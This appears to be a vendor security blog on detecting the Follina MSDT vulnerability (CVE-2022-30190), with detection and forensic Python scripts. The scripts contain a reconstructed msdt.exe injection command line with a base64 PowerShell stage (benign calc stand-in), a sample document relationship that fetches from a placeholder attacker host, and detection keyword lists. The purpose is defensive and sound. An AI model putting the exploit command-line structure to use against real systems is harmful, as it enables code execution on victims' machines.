Detect the Follina MSDT Vulnerability (CVE-2022-30190) with Qualys Multi-Vector EDR & Context XDR

Mayuresh Dani

A new remote code execution vulnerability, dubbed "Follina", has been found affecting Microsoft Office and the Windows Microsoft Support Diagnostic Tool (MSDT). In this blog, we examine a typical attack chain and the technical details of Follina, and show how to detect exploitation using both Qualys Multi-Vector EDR and Qualys Context XDR.

On May 27, 2022, a security researcher tweeted about a malicious Microsoft Word document with alarmingly low detection rates that he had found on VirusTotal. Only four vendors detected the document back then. Eventually, as other researchers saw the harmful potential of this low-interaction vulnerability, Microsoft acknowledged the threat and assigned CVE-2022-30190 for tracking purposes.

Microsoft's attribution shows that another researcher, "crazyman" of the Shadow Chaser Group, had reported the issue to Microsoft back in April. The vulnerability has been dubbed Follina because the original sample referenced 0438, the telephone area code of the Italian town of Follina. More importantly, although Microsoft has confirmed the vulnerability, as of this writing it has yet to be patched. Recent reports already describe the targeting of local U.S. and European government personnel and of a major telecommunications provider in Australia.

The Follina vulnerability’s footprint is significant as it affects ALL Microsoft Office versions – 2013 and above – on ALL currently supported Microsoft Windows operating systems – even the latest: Windows Server 2022! Microsoft Office is the most popular productivity suite on Earth, installed on 1B+ devices worldwide.

What makes this new MS Word vulnerability unique is that no macros are involved. Most malicious Word documents rely on the macro feature to deliver their payload, so conventional macro-based scanning will not detect Follina. Like all vulnerabilities that involve social engineering, the bar for exploitation is low: all an attacker needs to do is lure a targeted user into opening a Microsoft document, or viewing an HTML file, that embeds the malicious code.

Phases of an Attack Exploiting the Follina Vulnerability

Figure 1 shows the attack chain of a typical exploit leveraging Follina:

Fig.1: Follina attack chain

Here are the steps we observed:

Step 1: The attacker sends an email containing a malicious Microsoft Office document (.docx, etc.) to the targeted user.
Step 2: The user opens the file. Word resolves the attacker-controlled external resource referenced in the document's relationship part (word/_rels/document.xml.rels) and fetches it.
Step 3: The attacker's server returns an HTML page that invokes the ms-msdt: URL protocol handler; Word hands the URL to MSDT, which executes the embedded code.
Step 4: This code then launches additional commands, such as downloading Remote Access Trojans.

Technical Details of Follina: CVE-2022-30190

Qualys found that the macro-less MS Word document leveraged a novel technique: it referenced an external resource, which in turn served a malicious page. That page invoked the ms-msdt: URL protocol handler to execute PowerShell script code. ms-msdt: URLs are handled by the Microsoft Support Diagnostic Tool (MSDT), a legitimate Microsoft tool that is part of Microsoft's troubleshooting pack. MSDT should already be on every detection team's radar, since it features prominently in the LOLBAS project, albeit with different payloads. LOLBAS documents every binary, script, and library that can be used for Living Off The Land techniques. Our research found that operating systems such as Windows 2016, which do not ship msdt.exe by default, are nevertheless also vulnerable to Follina.

A Follina attack starts by loading an external reference pointing to a malicious URL. Macros play no part, so disabling them does not help; once the user leaves "Protected View" (for instance by clicking Enable Editing), the document fetches the external resource and the resulting code runs under the security context of the user who opened the MS Office document. The served HTML page then navigates to the ms-msdt: URL by assigning location.href (or window.location.href). In a malicious Microsoft Office document, the OLE Object external reference in the document.xml.rels file contains a URL that ends with a "!". Figure 2 below shows how the code appears:

Fig.2: document.xml.rels pointing to external reference
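The relationship entry described above can be checked without opening the document in Word at all: a .docx is a ZIP package, and every relationship part (`*.rels`) lists its targets with a TargetMode attribute. The following scanner is an added example, not Qualys code, and it uses constructed sample packages (the host name attacker.invalid is a placeholder). It flags external oleObject relationships that point at an http(s) URL and records whether the Target carries the trailing "!" marker seen in Follina documents. The benign sample shows that an ordinary external hyperlink, which is also an External relationship, does not alert.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# OOXML package namespace and relationship type (ECMA-376).
PKG_REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_OBJECT_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"


def external_relationships(docx_bytes):
    """Yield (rels_part, rel_type, target) for every relationship whose
    TargetMode is External, across all *.rels parts in the package."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as pkg:
        for part in pkg.namelist():
            if not part.endswith(".rels"):
                continue
            root = ET.fromstring(pkg.read(part))
            for rel in root.iter("{%s}Relationship" % PKG_REL_NS):
                if rel.get("TargetMode", "Internal") == "External":
                    yield part, rel.get("Type", ""), rel.get("Target", "")


def scan_docx(docx_bytes):
    """Return findings for external oleObject relationships that point at an
    http(s) URL. bang_marker records the trailing '!' described in the post."""
    findings = []
    for part, rel_type, target in external_relationships(docx_bytes):
        if rel_type != OLE_OBJECT_REL:
            continue
        if not re.match(r"(?i)^https?://", target):
            continue
        findings.append({
            "part": part,
            "target": target,
            "bang_marker": target.endswith("!"),
        })
    return findings


def build_docx(rels_xml):
    """Constructed minimal package (not a real Word file): only the parts the
    scanner reads, enough to exercise scan_docx offline."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as pkg:
        pkg.writestr("[Content_Types].xml", "<Types/>")
        pkg.writestr("word/document.xml", "<document/>")
        pkg.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


# Constructed sample: the relationship shape seen in Follina documents
# (external oleObject, http target, trailing "!"). Host is a placeholder.
SUSPICIOUS_RELS = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>
  <Relationship Id="rId996" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="http://attacker.invalid/index.html!" TargetMode="External"/>
</Relationships>"""

# Constructed benign sample: an external hyperlink is normal and must not alert.
BENIGN_RELS = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.qualys.com/" TargetMode="External"/>
</Relationships>"""

if __name__ == "__main__":
    for label, rels in (("suspicious", SUSPICIOUS_RELS), ("benign", BENIGN_RELS)):
        print(label, scan_docx(build_docx(rels)))
```

For mail-gateway or sandbox use, run `scan_docx` over the raw attachment bytes; any external oleObject target is worth a look, and a trailing "!" is a strong indicator of this specific technique.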

When the user opens the document, Word requests the external hxxp:// resource, and the server returns an HTML page whose script invokes an ms-msdt: command that carries PowerShell script code. Figure 3 shows the malicious code hosted:

Fig.3: Sample payload showcasing launch of PowerShell via ms-msdt

As shown in the image above, most samples observed in the wild carry the script as a base64 encoded string. Figure 4 shows the base64 encoded PowerShell script code (in blue) and its decoded form (in white):

Fig.4: PowerShell script code, decoded

Another variant that we observed involved the use of this malicious code (fig.5):

Fig.5: Decoded PowerShell script code variant 2

Qualys Multi-Vector EDR Can Detect Follina

In April 2022, Qualys delivered Multi-Vector EDR 2.0, which features comprehensive threat detection and enhanced prioritization so that security teams can respond quickly to the most critical incidents. Beyond detecting the attack, Qualys Multi-Vector EDR helps prevent follow-on attacks from emerging threats like Follina by identifying the vulnerabilities that malware exploits and driving their remediation.

Rules detecting the Follina attack chain described above are already available in Qualys Multi-Vector EDR and are mapped to MITRE ATT&CK technique T1203 (Exploitation for Client Execution). Our updated EDR offering operationalizes MITRE ATT&CK tactics, not just techniques.

Detection of MSDT.exe with suspicious arguments

One of the first markers of exploitation is msdt.exe being launched with a command line that invokes the ms-msdt: handler and carries base64 encoded PowerShell, as shown above (fig.6).

Associated process tree

The parent-child relationship is the strongest evidence of exploitation: an Office process such as winword.exe spawning msdt.exe (fig.7). msdt.exe is not normally a child of a Word process, so this pairing alone is a high-confidence signal.

Qualys Context XDR Can Detect Follina

We launched Qualys Context XDR back in February 2022. Since its introduction, we have continued to add new features to our cloud service, and one that will soon be available is support for Sysmon (System Monitor). Context XDR will leverage the process creation, network connection, and DNS query events that Sysmon writes to the Windows Event log.

The following three Sysmon event IDs supply the fields we use in a sample rule:

  1. Event ID 1: Process creation
     Records msdt.exe being started by a Microsoft Office executable, along with its command line parameters.
  2. Event ID 3: Network connection
     Records network connections initiated by msdt.exe.
  3. Event ID 22: DNSEvent (DNS query)
     Records name resolutions used to reach the malicious resources.
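The rule logic sketched in the three Sysmon events above, the base64 decoding shown in fig.4, and the two EDR markers (suspicious msdt.exe arguments, Office-parent process tree) can all be exercised on a few sample records. The script below is an added example, not the Qualys Context XDR rule or Qualys code; the Sysmon records are constructed (field names follow Sysmon's schema, the host, IP and ProcessGuid values are placeholders, and the encoded script is a harmless stand-in for the real payload). It correlates Event ID 1/3/22 on ProcessGuid, requires an Office parent, looks for the ms-msdt: invocation in the command line, and decodes the blob passed to FromBase64String so the analyst sees the script in clear.

```python
import base64
import ntpath
import re
from collections import defaultdict

OFFICE_PROCESSES = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
MSDT_MARKERS = ("ms-msdt:", "pcwdiagnostic", "frombase64string")

# Finds the blob handed to FromBase64String(...). In-the-wild samples splice the
# quotes in with [char]34, so the text between the call and the blob is skipped.
B64_RE = re.compile(r"FromBase64String\(.*?([A-Za-z0-9+/]{16,}={0,2})", re.I)


def decode_embedded_payload(cmdline):
    """Return the decoded script carried in an msdt.exe command line, or None."""
    m = B64_RE.search(cmdline)
    if not m:
        return None
    raw = base64.b64decode(m.group(1), validate=True)
    # Observed loaders decode with UTF8.GetString; fall back to UTF-16LE for
    # powershell -EncodedCommand style blobs.
    try:
        return raw.decode("utf-8")
    except UnicodeDecodeError:
        return raw.decode("utf-16-le", errors="replace")


def basename(path):
    return ntpath.basename(path or "").lower()


def correlate(events):
    """events: Sysmon records as dicts keyed by Sysmon field name.
    Returns one alert per msdt.exe process that (a) has an Office parent and
    (b) carries an ms-msdt: command line, enriched with that process's
    network connections (EID 3) and DNS queries (EID 22)."""
    net, dns = defaultdict(list), defaultdict(list)
    for e in events:
        if e["EventID"] == 3 and basename(e.get("Image")) == "msdt.exe":
            net[e["ProcessGuid"]].append((e.get("DestinationIp"), e.get("DestinationPort")))
        elif e["EventID"] == 22 and basename(e.get("Image")) == "msdt.exe":
            dns[e["ProcessGuid"]].append(e.get("QueryName"))

    alerts = []
    for e in events:
        if e["EventID"] != 1 or basename(e.get("Image")) != "msdt.exe":
            continue
        if basename(e.get("ParentImage")) not in OFFICE_PROCESSES:
            continue
        cmd = e.get("CommandLine", "")
        if not any(marker in cmd.lower() for marker in MSDT_MARKERS):
            continue
        guid = e["ProcessGuid"]
        alerts.append({
            "technique": "T1203",
            "parent": e.get("ParentImage"),
            "command_line": cmd,
            "decoded_payload": decode_embedded_payload(cmd),
            "network": net.get(guid, []),
            "dns": dns.get(guid, []),
        })
    return alerts


# Constructed sample data. PAYLOAD is a benign stand-in for the decoded script.
PAYLOAD = "Start-Process calc.exe"
B64 = base64.b64encode(PAYLOAD.encode()).decode()
MSDT_CMD = (
    r'"C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param '
    '"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile='
    "$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+"
    "'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'"
    + B64 +
    "'+[char]34+'))'))))i/../../../../../../../../../../../../../Windows/System32/mpsigstub.exe\""
)
GUID = "{F00D0001-0000-0000-0000-000000000001}"
SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessGuid": GUID, "Image": r"C:\Windows\System32\msdt.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": MSDT_CMD},
    {"EventID": 22, "ProcessGuid": GUID, "Image": r"C:\Windows\System32\msdt.exe",
     "QueryName": "attacker.invalid"},
    {"EventID": 3, "ProcessGuid": GUID, "Image": r"C:\Windows\System32\msdt.exe",
     "DestinationIp": "203.0.113.10", "DestinationPort": 80},
    # Benign: an administrator launching a troubleshooter from Explorer.
    {"EventID": 1, "ProcessGuid": "{F00D0002-0000-0000-0000-000000000002}",
     "Image": r"C:\Windows\System32\msdt.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "msdt.exe -id NetworkDiagnosticsWeb"},
]

if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert["technique"], alert["parent"], alert["dns"], alert["network"])
        print("decoded:", alert["decoded_payload"])
```

The Office-parent check is what keeps the rule quiet on ordinary troubleshooter use; the decoded payload is what tells the responder whether the second stage was a download cradle or something else.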

This easily translates into a Qualys Context XDR rule as follows (fig.8):

Fig.8: Partial Qualys Context XDR rule logic

Post-processing of events leads to a screen like the one below (fig.9):

Fig.9: Correlation of an exploitation event in Qualys Context XDR

An alert is created by correlating the values of the different Sysmon fields. Figure 10 shows these enriched values in additional detail:

Fig.10: Excerpt of values correlating Sysmon fields to create alert

How to Detect Follina Exploitation Attempts (CVE-2022-30190)

The diagnostic logs that MSDT writes help determine whether a system was compromised through the Follina vulnerability (CVE-2022-30190). Microsoft's MSDT documentation lists the following default locations for diagnostic output; the location can be overridden with the "/dt" command line parameter:

  1. %LOCALAPPDATA%\Diagnostics 
  2. %LOCALAPPDATA%\ElevatedDiagnostics

In the Qualys Research Team’s test system, the diagnostic data was stored under:

%LOCALAPPDATA%\Diagnostics\<9-digit-number>\<date YYYYMMDD.000>

These directories contain several files that can help Digital Forensics and Incident Response personnel to determine what file was run. For example, figure 11 is an excerpt from a PCW.debugreport.xml file in one of our test systems that shows the path and the binary that was run:

Fig.11: AppName value in PCW.debugreport.xml depicting the command run via Follina

Additionally, should the above file have been tampered with or removed, the ResultReport.xml file in the same directory provides further details, as shown below (fig.12):

Fig.12: Additional forensics information present in ResultReport.xml
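For triage across many hosts it helps to walk the whole Diagnostics tree rather than open reports one at a time. The script below is an added example, not Qualys tooling; it assumes the directory layout described above (%LOCALAPPDATA%\Diagnostics\<9-digit-number>\<YYYYMMDD.000>\) and, because the exact report schema is not shown here, it pulls the AppName value out of PCW.debugreport.xml and ResultReport.xml with regexes that accept either an attribute (AppName="...") or an element form, an assumption a responder should confirm against a real report. The sample tree it builds is constructed, with a placeholder value standing in for the recorded command.

```python
import os
import re
import tempfile
from pathlib import Path

REPORT_FILES = {"PCW.debugreport.xml", "ResultReport.xml"}

# Assumption: AppName appears as an attribute or as an element/Data node.
APPNAME_RES = [
    re.compile(r'AppName\s*=\s*"([^"]+)"'),
    re.compile(r'name="AppName"[^>]*>([^<]+)<', re.I),
    re.compile(r"<AppName>([^<]+)</AppName>", re.I),
]
# Strings that should never appear in a legitimately launched application path.
SUSPICIOUS_TOKENS = ("invoke-expression", "frombase64string", "powershell", "ms-msdt", "$(")


def triage(root):
    """Walk a Diagnostics tree (live: %LOCALAPPDATA%\\Diagnostics, or a copy
    collected from the host) and report every MSDT session with its AppName."""
    root = Path(root)
    hits = []
    for path in sorted(root.rglob("*")):
        if path.name not in REPORT_FILES:
            continue
        text = path.read_text(encoding="utf-8", errors="replace")
        names = [n for rx in APPNAME_RES for n in rx.findall(text)]
        parts = path.relative_to(root).parts   # (<session>, <YYYYMMDD.000>, <file>)
        hits.append({
            "session": parts[0] if len(parts) >= 3 else None,
            "run": parts[1] if len(parts) >= 3 else None,
            "file": path.name,
            "app_names": names,
            "suspicious": any(tok in n.lower() for n in names for tok in SUSPICIOUS_TOKENS),
        })
    return hits


# Constructed sample: one MSDT session whose AppName carries the injected
# expression (placeholder text, not a real payload), in both report files.
INJECTED = "$(Invoke-Expression(...))i/../../../Windows/System32/mpsigstub.exe"
PCW_SAMPLE = '<?xml version="1.0"?><DebugReport><App AppName="%s"/></DebugReport>' % INJECTED
RESULT_SAMPLE = '<?xml version="1.0"?><Report><Data name="AppName">%s</Data></Report>' % INJECTED


def build_sample_tree():
    root = Path(tempfile.mkdtemp(prefix="diag_"))
    run_dir = root / "123456789" / "20220601.000"
    run_dir.mkdir(parents=True)
    (run_dir / "PCW.debugreport.xml").write_text(PCW_SAMPLE, encoding="utf-8")
    (run_dir / "ResultReport.xml").write_text(RESULT_SAMPLE, encoding="utf-8")
    return root


if __name__ == "__main__":
    live = os.environ.get("LOCALAPPDATA")
    root = Path(live) / "Diagnostics" if live else build_sample_tree()
    for hit in triage(root):
        flag = "SUSPICIOUS" if hit["suspicious"] else "ok"
        print(flag, hit["session"], hit["run"], hit["file"], hit["app_names"])
```

Run it against a collected copy of the Diagnostics folder when the host itself is no longer available; the session and run fields line up with the directory names, which gives a timeline even if the XML contents have been altered.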


Above all, the Qualys Research Team recommends that enterprises apply the workaround published by Microsoft until patches are available: back up and then delete the ms-msdt URL protocol handler registry key (HKEY_CLASSES_ROOT\ms-msdt), so that Office can no longer hand ms-msdt: links to MSDT. Security teams may also add custom AppLocker publisher rules to block msdt.exe from executing, or apply the Attack Surface Reduction (ASR) rule that blocks all Office applications from creating child processes. Additionally, train users not to open unsolicited email attachments, and enable Qualys Multi-Vector EDR and Qualys Context XDR on affected systems.


Update: As part of the June 2022 Patch Tuesday release, Microsoft has released updates remediating this vulnerability.




MITRE ATT&CK mapping:

ID        | Tactic         | Technique
----------|----------------|----------------------------------------------
T1566.001 | Initial Access | Phishing: Spearphishing Attachment
T1059.001 | Execution      | Command and Scripting Interpreter: PowerShell
T1203     | Execution      | Exploitation for Client Execution


  • Arun Pratap Singh, Engineer, Threat Research, Qualys
  • Pawan N, Engineer, Threat Research, Qualys